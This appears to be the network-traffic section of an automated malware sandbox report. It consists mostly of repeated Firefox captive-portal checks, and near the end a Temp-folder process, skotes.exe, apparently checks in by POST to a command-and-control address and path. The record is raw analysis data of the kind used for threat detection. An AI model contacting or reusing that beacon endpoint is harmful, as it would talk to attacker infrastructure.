                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.646326065 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:40.979193926 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63463
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.099231958 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.432233095 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63464
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.528458118 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:41.861015081 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63464
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.926248074 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.262545109 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63466
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:46.939016104 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:47.273812056 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63470
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:57.396934986 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.282004118 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.614993095 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63481
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.638370037 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.971419096 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63481
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:08.996557951 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:09.018321991 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:09.351536989 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63492
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:19.455212116 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:19.815546989 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:20.149033070 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63502
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:30.231203079 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:40.398782015 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:50.691286087 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:00.966259956 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.622735023 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.956060886 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63544
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:12.001616001 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:22.195621967 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:10.999118090 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:11.332550049 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63614
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:23.674243927 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:24.006882906 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63626
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:15.700069904 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:16.034431934 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63738
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.128592968 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.462805986 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                                            Content-Length: 90
                                                                                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                                                                                            Date: Wed, 20 Nov 2024 17:33:57 GMT
                                                                                                                                                                                                                                                                                                            Age: 63789
                                                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                                                            Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                            Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            27192.168.2.450007185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.786633968 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:19.223776102 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:18 GMT
